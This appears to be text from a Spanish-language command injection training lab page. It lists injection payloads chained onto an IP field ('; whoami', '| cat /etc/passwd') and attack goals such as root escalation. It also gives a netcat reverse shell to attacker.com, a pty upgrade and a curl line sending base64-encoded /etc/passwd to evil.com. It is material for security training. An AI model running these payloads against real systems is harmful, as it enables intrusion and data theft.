Command Injection - Laboratorio Avanzado

Ejecuta comandos del sistema mediante inyección en aplicaciones web vulnerables

💻 LABORATORIO DE COMMAND INJECTION AVANZADO

⚙️Configuración del Sistema

Sistema Operativo

Privilegios Actuales

🟡 USER

Tipo de Inyección

Hostname or IP Address (Command Injection Point)

127.0.0.1; whoami

127.0.0.1 && id

127.0.0.1 || ls -la

127.0.0.1 | cat /etc/passwd

•Ejecutar comandos del sistema

•Escalar privilegios a root

•Establecer reverse shell

•Exfiltrar datos sensibles

•Enumerar el sistema

nc -e /bin/bash attacker.com 4444

python3 -c "import pty;pty.spawn('/bin/bash')"

base64 /etc/passwd | curl -d @- evil.com